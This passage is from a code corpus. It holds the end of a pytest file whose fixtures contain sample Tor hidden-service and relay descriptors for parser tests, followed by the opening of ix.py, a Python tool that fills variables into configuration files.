YUVnVTNSQ1E0ZEVGTnlDSDNDbTVTNGFDa2dxbHp0VmJPSlBlVmQKVjJaTjk4dW8x
OGlXa3JySENiZUdTWTVqdkkvdTFlUzFydTNNTkM1NTBhNDE3RHdFUGlaUWJxMitO
N1dGYisxbwpOa2x2TkllZTZGMDllb2FYMExuVGJjR1RheGJLaHF0cWh4cGJvYTVJ
RUV0L05CajRmNE05QWdNQkFBRT0KLS0tLS1FTkQgUlNBIFBVQkxJQyBLRVktLS0t
LQpzZXJ2aWNlLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0tLS0KTUlH
SkFvR0JBTzZzbjNzekJXVGxjQVAvV1lIQ2ZzVmVnSDBPNmNlcHlWRVllOW82YzQ4
cGh6VDBoZzFnWmJMdApOS3lqM2xWR1RaYVFxY3Jvak16bzhlbkEwR2VyeGsrWVpF
THV3eDRCYmIraUk5d1gvbmJib3ptejhLZjhNdnVGCmNkakFDalEwV3liVXBtcWdk
TXBpVHc4SFNSbWh0SWlsQXE1L1VnYzNTaVRQbHlqWVYxN1BBZ01CQUFFPQotLS0t
LUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCgo=
-----END MESSAGE-----
signature
-----BEGIN SIGNATURE-----
XkVVwRd1reFUb0KqdtYUWcLUCQduq7GnGJ8IpNYbsI4x8LadiRi9gxABv8E4OjYQ
5CiP6qso+<KEY>
NwjHDSI4mD57pkSzvPgd+t/hrA3AFAWZu49eUw4BYwc=
-----END SIGNATURE-----
"""
hs_example2 = """HTTP/1.0 200 OK
Date: Wed, 20 Mar 2019 21:17:16 GMT
Content-Type: text/plain
X-Your-Address-Is: 192.168.127.12
Content-Encoding: identity
Content-Length: 3253
Pragma: no-cache
rendezvous-service-descriptor expocwozpjpjce7kfcdyu3et25aswqdf
version 2
permanent-key
-----BEGIN RSA PUBLIC KEY-----
<KEY>
-----END RSA PUBLIC KEY-----
secret-id-part 2o5f46v3wjaoysjde3z2tjkax5unwp4z
publication-time 2019-03-20 21:00:00
protocol-versions 2,3
introduction-points
-----BEGIN MESSAGE-----
<KEY>
"""
def test_hs_parser(hs_example):
res = HSDescriptorParser.parse(hs_example)
print(res)
@pytest.fixture
def ip_example():
return """introduction-point ysnbo5iqzktfhwthe67q4b73p5lkb4e5
ip-address 192.168.3.11
onion-port 9001
onion-key
-----<KEY>-----
service-key
-----<KEY>-----
introduction-point fk64ywrgk3g6dx3accjlzjqmore7pwkw
ip-address 192.168.3.11
onion-port 443
onion-key
-----<KEY>
-----END RSA PUBLIC KEY-----
service-key
-----BEGIN RSA PUBLIC KEY-----
MIGJAoGBANw4LrTMxv1lXQp2XgKXUklE/KgdHB3bSQ+f8FzIIEat+ndVvTuq4ILp
PngUxqTS8ulc0ZMJ+kLezLBzYupVZy+c4Lhc9SCROTtz93yoO45NPtcszKaNO1+K
kf95gp5BHvuC51OD4UGJOgaQzusRjrbfDc2KB2D5g+scok86qgShAgMBAAE=
-----END RSA PUBLIC KEY-----
introduction-point 3ugi53c4uqbkt6sepdyqymneid3r62ef
ip-address 192.168.127.12
onion-port 143
onion-key
-----BEGIN RSA PUBLIC <KEY>
-----END RSA PUBLIC KEY-----
service-key
-----BEGIN RSA PUBLIC <KEY>
-----END RSA PUBLIC KEY-----
"""
def test_ip_parser(ip_example):
res = IntroPointParser.parse(ip_example)
print(res)
@pytest.fixture
def rd_example():
return """router Nyx 192.168.3.11 9001 0 9030
identity-ed25519
-----BEGIN ED25519 CERT-----
<KEY>
-----END ED25519 CERT-----
master-key-ed25519 rjfGh82j0kKpEWYvZ1O/aDSk/3taUrAcPLtGHhxekn0
platform Tor 0.3.5.8 on Linux
proto Cons=1-2 Desc=1-2 DirCache=1-2 HSDir=1-2 HSIntro=3-4 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Relay=1-2
published 2019-03-31 11:43:32
fingerprint 8532 DE42 43E4 949E 4EA8 6E88 CDCA 6821 582F 1A13
uptime 2840486
bandwidth 1073741824 1073741824 24702282
extra-info-digest FFDAB70266F42AE8938EC1C0E6DC1A275DD903FE bCEVMfYHbSxL6Th0iJj0Wo8HZrzLnyqDvlheyO1JzNE
onion-key
-----<KEY>
-----END RSA PUBLIC KEY-----
signing-key
-----BEGIN RSA PUBLIC <KEY>
-----END RSA PUBLIC KEY-----
onion-key-crosscert
-----BEGIN CROSSCERT-----
<KEY>
-----END CROSSCERT-----
ntor-onion-key-crosscert 1
-----BEGIN ED25519 CERT-----
<KEY>7Rh4cXpJ9APezxMtt8tMB
tpDMZnC+Hq9pK62Yu6Na3H+T0+fdme8CmhXa9pQ8NgCpeW7Es9oNXaCev8BcMol/
6AFJ3vFidAI=
-----END ED25519 CERT-----
family $13E8EB1D9FD7470AA87A47DC93538E88340A0903 $157106182B9F33663CAEDCD883D302316331DE5E $2C5FDD910AE3E21C0B6F9DD4BF397F570C8358FA $3844DFD3446832A3C8A137EEA616D4EEB370C788 $42E0FB190D20522C6C8C71E42B71DA33AC7A780E $4DDBC57BA2A63F0439FD41D92BFF8E141CC61213 $54FA84FF74B0C2BAC45CEADB4BF9C9CAEF72020F $67469C0671BF8D4BECB11F006AD541E9BC54EBCB $69D22FAEE5D4E18A098D5DEF68EAEE8D24F53CCA $70A81E423F94A9BF58D2FF432BBF59FA73426DB6 $8154154C636EC317C7165FD839F34F79963376C1 $88C3708A9D71ECEC1910B63C3FAA5BF60CD7E199 $8C34A154997812D1396BC462A42DA0A59B55952D $AEA760EE120B630262C70C1C11D4158BBF12C602 $B5EDD091D81655C2EBADB38065A868AA20259AC3 $B756D7123D759EAB62CB6A09148AD65AC216F3E3 $C79517FFC1327B0D4E86218A34C8E2570F338CF9 $C8850DE0EBC07481808F32F2BAA76CA65CB659FB $CE946DFEC40A1BFC3665A4727F54354F57297497
hidden-service-dir
contact abuse [AT] torworld.org - BTC 34yFiqwbcUA5MYSvUcpjqARvhoTwMFjmPs
ntor-onion-key owtGGV469gdDNIWfnIlIHgR7CvM0Ak5VwLiZCtBgtzc=
reject 0.0.0.0/8:*
reject 169.254.0.0/16:*
reject 127.0.0.0/8:*
reject 192.168.0.0/16:*
reject 10.0.0.0/8:*
reject 172.16.0.0/12:*
reject 192.168.3.11:*
reject 172.16.31.10/18:*
reject 192.168.3.11/24:*
reject 192.168.127.12/24:*
reject 37.139.49.0/24:*
reject 172.16.58.3/24:*
reject 192.168.127.12/24:*
reject 172.16.31.10/24:*
reject 192.168.3.11/24:*
reject 172.16.17.32/24:*
reject 172.16.31.10/24:*
reject 192.168.3.11/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 192.168.127.12/24:*
reject 192.168.127.12/24:*
reject 192.168.127.12/24:*
reject 172.16.17.32/24:*
reject 192.168.3.11/24:*
reject 172.16.58.3/24:*
reject 192.168.127.12/21:*
reject 172.16.31.10/24:*
reject 172.16.31.10/13:*
reject 192.168.3.11/16:*
reject 192.168.127.12/16:*
reject 172.16.31.10/24:*
reject 192.168.127.12/24:*
reject 172.16.31.10/24:*
reject 192.168.3.11/24:*
reject 192.168.127.12/28:*
reject 172.16.31.10/24:*
reject 192.168.3.11/24:*
reject 172.16.17.32/22:*
reject 172.16.17.32/24:*
reject 192.168.3.11/24:*
reject 192.168.3.11/24:*
reject 172.16.17.32/24:*
reject 192.168.3.11/22:*
reject 172.16.17.32/24:*
reject 172.16.31.10/24:*
reject 172.16.31.10/24:*
reject 172.16.17.32/24:*
reject 172.16.58.3/23:*
reject 172.16.17.32/24:*
reject 172.16.58.3/24:*
reject 192.168.127.12/24:*
reject 172.16.58.3/23:*
reject 172.16.58.3/22:*
reject 172.16.31.10/22:*
reject 172.16.31.10/23:*
reject 192.168.3.11/24:*
reject 192.168.127.12/23:*
reject 192.168.127.12/24:*
reject 172.16.58.3/24:*
reject 192.168.127.12/24:*
reject 172.16.17.32/24:*
reject 192.168.127.12/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 172.16.31.10/24:*
reject 192.168.127.12/24:*
reject 192.168.127.12/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 192.168.3.11/24:*
reject 192.168.3.11/22:*
reject 192.168.127.12/22:*
reject 172.16.17.32/19:*
reject 192.168.127.12/24:*
reject 192.168.3.11/24:*
reject 172.16.17.32/24:*
reject 172.16.17.32/24:*
reject 172.16.58.3/24:*
reject 192.168.127.12/24:*
reject 192.168.3.11/24:*
reject 192.168.127.12/24:*
reject 192.168.3.11/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/22:*
reject 172.16.31.10/20:*
reject 172.16.17.32/16:*
reject 172.16.17.32/17:*
reject 192.168.3.11/20:*
reject 172.16.17.32/22:*
reject 192.168.127.12/24:*
reject 192.168.127.12/20:*
reject 172.16.17.32/24:*
reject 172.16.17.32/24:*
reject 192.168.3.11/24:*
reject 172.16.31.10/24:*
reject 172.16.17.32/23:*
reject 172.16.17.32/24:*
reject 172.16.31.10/24:*
reject 172.16.58.3/24:*
reject 172.16.31.10/24:*
reject 192.168.127.12/23:*
reject 172.16.58.3/23:*
reject 192.168.127.12/24:*
reject 172.16.17.32/24:*
reject 172.16.17.32/24:*
reject 172.16.58.3/24:*
reject 172.16.17.32/22:*
reject 192.168.3.11/23:*
reject 192.168.127.12/24:*
reject 192.168.127.12/24:*
reject 172.16.58.3/24:*
reject 172.16.17.32/24:*
reject 172.16.17.32/22:*
reject 192.168.3.11/22:*
reject 172.16.17.32/22:*
reject 172.16.17.32/22:*
reject 192.168.127.12/24:*
reject 172.16.58.3/22:*
reject 172.16.31.10/24:*
reject 172.16.17.32/24:*
reject 172.16.31.10/24:*
reject 192.168.3.11/24:*
reject 172.16.31.10/24:*
reject 192.168.127.12/24:*
reject 172.16.17.32/24:*
reject 192.168.127.12/24:*
reject 172.16.31.10/24:*
reject 172.16.31.10/24:*
reject 172.16.31.10/23:*
reject 172.16.31.10/24:*
reject 172.16.17.32/24:*
reject 172.16.17.32/24:*
reject 172.16.58.3/22:*
reject 172.16.31.10/24:*
reject 172.16.17.32/24:*
reject 172.16.17.32/24:*
reject 192.168.3.11/24:*
reject 192.168.127.12/24:*
reject 192.168.127.12/23:*
reject 192.168.3.11/22:*
reject 172.16.17.32/20:*
reject 172.16.31.10/24:*
reject 172.16.58.3/23:*
reject 192.168.127.12/18:*
reject 68.119.232.0/21:*
reject 192.168.3.11/16:*
reject 192.168.127.12/14:*
reject 172.16.58.3/16:*
reject 172.16.17.32/15:*
reject 172.16.31.10/24:*
reject 192.168.127.12/24:*
reject 192.168.3.11/21:*
reject 192.168.127.12/24:*
reject 192.168.127.12/24:*
reject 172.16.31.10/24:*
reject 192.168.127.12/24:*
reject 192.168.127.12/24:*
reject 172.16.31.10/24:*
reject 172.16.58.3/24:*
reject 192.168.3.11/24:*
reject 192.168.127.12/24:*
reject 172.16.17.32/24:*
reject 192.168.127.12/22:*
reject 172.16.58.3/24:*
reject 192.168.3.11/24:*
reject 172.16.31.10/24:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 192.168.127.12/24:*
reject 192.168.127.12/24:*
reject 172.16.31.10/24:*
reject 172.16.17.32/24:*
reject 172.16.58.3/24:*
reject 172.16.17.32/24:*
reject 192.168.3.11/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 172.16.17.32/21:*
reject 192.168.3.11/24:*
reject 172.16.31.10/24:*
reject 172.16.58.3/22:*
reject 192.168.127.12/22:*
reject 192.168.3.11/22:*
reject 172.16.17.32/21:*
reject 192.168.3.11/24:*
reject 192.168.3.11/24:*
reject 172.16.31.10/22:*
reject 172.16.17.32/22:*
reject 192.168.127.12/24:*
reject 172.16.31.10/24:*
reject 172.16.58.3/24:*
reject 192.168.3.11/24:*
reject 172.16.31.10/24:*
reject 192.168.127.12/24:*
reject 172.16.17.32/22:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.3.11:*
accept *:20-21
accept *:43
accept *:53
accept *:80
accept *:110
accept *:143
accept *:220
accept *:443
accept *:873
accept *:989-990
accept *:991
accept *:992
accept *:993
accept *:995
accept *:1194
accept *:1293
accept *:3690
accept *:4321
accept *:5222-5223
accept *:5228
accept *:9418
accept *:11371
accept *:64738
reject *:*
tunnelled-dir-server
router-sig-ed25519 JWCYm75YxNMFHgUUI4cJyRgDGwcIedVSYIQERCdJFlRMjxPS9LOvcUzuv4rBZQLC3RAA80j7D5udcfeW0R0SDw
router-signature
-----BEGIN SIGNATURE-----
SLhtm94eITNNjle4PRclrt7uW/PswS<KEY>tD+ENoZQx02HNWhD2Ovw8D
LEAPxV9sbjt8fzJ/EIzdl8vh+Nz2SIPJFBU1dkRkWSVE+Is0JPRqNKlzpVpWfW8h
zKOoQK1MV0YfYNhvLoSV9li7ed1GJrw9kmWOUgoRV3s=
-----END SIGNATURE-----
"""
def test_rd_parser(rd_example):
res = RouterDescriptorParser.parse(rd_example)
print(res)
@pytest.fixture
def rd_example2():
return """router FalkensteinTor02 172.16.58.3 9001 0 0
identity-ed25519
-----BEGIN ED25519 CERT-----
AQ<KEY>
L<KEY>
-----END ED25519 CERT-----
master-key-ed25519 E5QPti6y4w8KJY1W24A5m7nUjyPGXMYi0dKg2iAbJSw
or-address [2a01:4f8:161:32c7::2]:9001
platform Tor 0.4.5.0-alpha-dev on Linux
proto Cons=1-2 Desc=1-2 DirCache=1-2 FlowCtrl=1 HSDir=1-2 HSIntro=3-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-3
published 2020-08-20 09:56:35
fingerprint 0512 FE6B E9CC A0ED 1331 52E6 4010 B2FB A141 EB10
uptime 64805
bandwidth 31457280 73400320 33471488
extra-info-digest F631D985A46F850C46FE2355947D36CA45DBE335 M/2vGW74uurcpt0e+7/EJqOV4LpoJRYAZ+G7I9f58L4
onion-key
-----<KEY>
-----END RSA PUBLIC KEY-----
signing-key
-----BEGIN RSA PUBLIC KEY-----
MIGJAoGBAL+bi9Kfe8dhwaaq8c5kcAXbCHUyvfx9gVBCuDj7jAOQKy16zBfuUh7q
614bwRiD4sFC4QFq+j43EjJgXeReAH9sDeWJxP3Q9muEuCcqfmf+OAlYjruXEYrT
LEO6q2Hd22nJ9WaxEHgvSCvECTNmODUdgP0DJpkKcwks3VM4wamZAgMBAAE=
-----END RSA PUBLIC KEY-----
onion-key-crosscert
-----<KEY>
-----END CROSSCERT-----
ntor-onion-key-crosscert 1
-----BEGIN ED25519 CERT-----
<KEY>
-----END ED25519 CERT-----
family $0512FE6BE9CCA0ED133152E64010B2FBA141EB10 $08F06A0DDAFABF9A26FCB2E392A1435F9E048216 $0A7208B8903DD3FF5CDFA218A3823AF498CE69CE $128FC6D8FBF753121C5662FEE309CCD47B64BA6B $599A708756048993A1029B2775EEF8C9E40BB640 $695D811B130673C2DE8DCFC5A9E742790BD25066 $7185B69E3267E71D0E4CBE30209677205DEA5E67 $8E5F4EE45E0631A60E59CAA42E1464FD7120459D $B70BD334FFEE23E653B75219AE12CF0236BCFCBB $B76A047C20D3E4F9B5A64428298DA55A90D62472 $D7230F4F13324A28C308AF94E2385D0A7F1B05F9 $DEF8C760A79FEF2358E03AE5A1950086ABEB953E $F0F13714732C347312426EC2B8D5C4940EAA45BA $F5C3DA7642BB037E0D279359AE88CD7FC03A98A0
hidden-service-dir
contact <tor AT afo MINUS tm DOT org>
ntor-onion-key xbqQBTwgBWJxkxBrHuHsKp5WyZ4yof09zsnGZMXB+Rk
reject *:*
tunnelled-dir-server
router-sig-ed25519 Hk2KgDHyw7OAo8g79eo7mEHK/k3UszFAH1Fkole70BIdUDOvA/8oHwSA2aO+Rp1i6v0I/LlKr0u8/pqDzGd7Bg
router-signature
-----BEGIN SIGNATURE-----
UmJeAncV38dJBgsKSVxw14cRdo/YTu3owAa+YJOWkWsNl03UATGeNAWQGc2ZwhI3
nk4ha7uQ254z5uDyWT5vD7QbPREcFbWvif7EWRqqBi0kdwSClYzMI/+4dFh+dz3v
jvfDaEld8KBz3UxumcxRnswmDzC9zsS3Bq/LxQ7LrR4=
-----END SIGNATURE-----
"""
def test_rd_parser2(rd_example2):
res = RouterDescriptorParser.parse(rd_example2)
print(res)
``` |
{
"source": "0x20F/ix",
"score": 2
} |
#### File: 0x20F/ix/ix.py
```python
import os, configparser, argparse
import re, threading, json, hashlib
import pathlib
from datetime import datetime
# Global verbosity check
# Gets changed by the command line flag '-v'
verbose = False
# Colors
RED = '\x1B[31;1m'
CYAN = '\x1B[36m'
GREEN = '\x1B[32;1m'
YELLOW = '\x1B[33;1m'
RESET = '\x1B[0m'
WHITE = '\x1B[37;1m'
MAGENTA = '\x1B[35;1m'
# _
# ___| | __ _ ___ ___ ___ ___
# / __| |/ _` / __/ __|/ _ \/ __|
# | (__| | (_| \__ \__ \ __/\__ \
# \___|_|\__,_|___/___/\___||___/
# -------------------------------------------------------------------------
class Parser:
@staticmethod
def get_config_key(key):
'''
Given a key of the format 'key.value', find out what the
value for the variable of that format is within the ix config
'''
try:
k, v = key.strip().split('.', 1)
return config[k][v]
except:
return None
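    # Example (assuming an ixrc with a '[colors]' section containing
    # 'background = #181b21', purely for illustration):
    # Parser.get_config_key('colors.background') -> '#181b21'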
@staticmethod
def get_secondary_key_value(key):
'''
        Resolve the configuration value for the given key,
        if one exists.
Parameters:
key (str): The key to look for
Returns:
str: The value, or null
'''
value = Parser.get_config_key(key)
if not value:
return None
return os.path.expandvars(value)
@staticmethod
def get_main_key_value(key):
'''
        Resolve the configuration value for the given key, if one
        exists, making sure to unravel any helpers within the
        provided key.
Parameters:
key (str): The key to look for
Returns:
str: The value, or null
'''
stripped = key.strip()
value = None
if len(stripped.split(' ', 1)) == 1:
value = Parser.get_config_key(key)
if not value: return None
return os.path.expandvars(value)
# Check for helpers
helper, parameters = stripped.split(' ', 1)
parameters = [ param.strip() for param in parameters.split(';') ]
# First argument doesn't have a name
main = parameters.pop(0)
main = Parser.get_config_key(main) or main
modifier_keys = list()
modifier_values = list()
for param in parameters:
name, value = param.split(':')
name = name.strip()
value = value.strip()
modifier_keys.append(name)
modifier_values.append(Parser.get_config_key(value) or value)
modifiers = dict(zip(modifier_keys, modifier_values))
value = Helpers.call(helper, main, modifiers)
return os.path.expandvars(value)
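    # Sketch of the helper syntax this method understands (hypothetical keys):
    # the key 'rgb colors.background; alpha: 0.8' resolves 'colors.background'
    # from the config, then calls Helpers.rgb() with the named modifier
    # alpha='0.8'.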
@staticmethod
def parse_secondary_keys(string, prefix):
'''
        Find secondary variables within a file (these are variables within main
        variables), denoted by '[]', and check whether they have a defined value
        inside the configuration file.
If they do, replace the variable with the value from the configuration.
Parameters:
string (str): The data we want to look through for variables
prefix (str): What prefix the parent variables are denoted by
'''
pattern = re.compile('%s{{.+\\[(.+?)\\].+}}' % re.escape(prefix), re.MULTILINE)
items = set(re.findall(pattern, string))
unmatched = None
contents = string
for key in items:
value = Parser.get_secondary_key_value(key)
if not value:
if not unmatched: unmatched = []
unmatched.append(f'[{key}]')
continue
contents = contents.replace(f'[{ key }]', value)
return ( contents, unmatched )
@staticmethod
def parse_main_keys(string, prefix):
'''
        Find main variables within a file (something like ${{}}) and check
        whether they have a defined value inside the configuration file.
        If they do, replace the variable with the value from the configuration.
Parameters:
string (str): The data we want to look through for variables
prefix (str): What prefix the variables are denoted by
'''
pattern = re.compile('%s{{(.+?)}}' % re.escape(prefix), re.MULTILINE)
items = set(re.findall(pattern, string))
unmatched = None
contents = string
for key in items:
full_key = '{}{}{}{}'.format(prefix, sequence[0], key, sequence[1])
value = Parser.get_main_key_value(key)
if not value:
if not unmatched: unmatched = []
unmatched.append(full_key)
continue
contents = contents.replace(full_key, value)
return (contents, unmatched)
@staticmethod
def expand_ix_vars(string, prefix):
'''
Look through a given string of data in a file and find every
variable starting with the prefix defined for that specific file.
Replace all thos variables with their related values inside the
configuration file.
Parameters:
string (str): The string contents in which to look for variables
prefix (str): The prefix used for including the variables in the given string
Returns:
contents (str): The original content with all the variables replaced
unmatched (list): The keys for all the variables that couldn't be matched within the string
'''
contents, unmatched_secondary = Parser.parse_secondary_keys(string, prefix)
contents, unmatched_main = Parser.parse_main_keys(contents, prefix)
if not unmatched_secondary: unmatched_secondary = []
if not unmatched_main: unmatched_main = []
unmatched = unmatched_main + unmatched_secondary
return (contents, unmatched)
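    # Usage sketch: with prefix '$' and a configured value for 'colors.bg',
    # Parser.expand_ix_vars('bg ${{ colors.bg }}', '$') would return the string
    # with the variable substituted, plus a list of any keys it couldn't match.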
@staticmethod
def wrap_file(file_path):
'''
Wrap a file and its contents in the custom File class
to allow for easier handling.
This finds whether or not a file is ix compatible, what
comment type it uses, and makes sure to setup all the ix
configuration found within the file.
Parameters:
file_path (str): The path to the file we want to wrap
'''
root, name = file_path.rsplit('/', 1)
file = get_file_lines(file_path)
if not file:
return None
lines = list(file)
found = False
current = None
# Check the first few lines of the file for the trigger.
# If the trigger isn't found, assume this file shouldn't
# be processed.
for idx, line in enumerate(lines):
for entry in entries:
start = '{}{}'.format(entry, notation)
if line.startswith(start):
if trigger in line:
found = True
current = File(root, name, start)
continue
if not found:
continue
clean = line.replace(start, '').strip()
if clean.startswith(tuple(current.fields)):
field, data = clean.split(':', 1)
current.load_field((field, data))
continue
if idx == 20 and not found:
return None
return current
@staticmethod
def find_ix(root):
'''
Find all files that contain the 'ix' trigger so we know what
needs parsing.
Parameters:
root (str): The directory to look into for files
Returns:
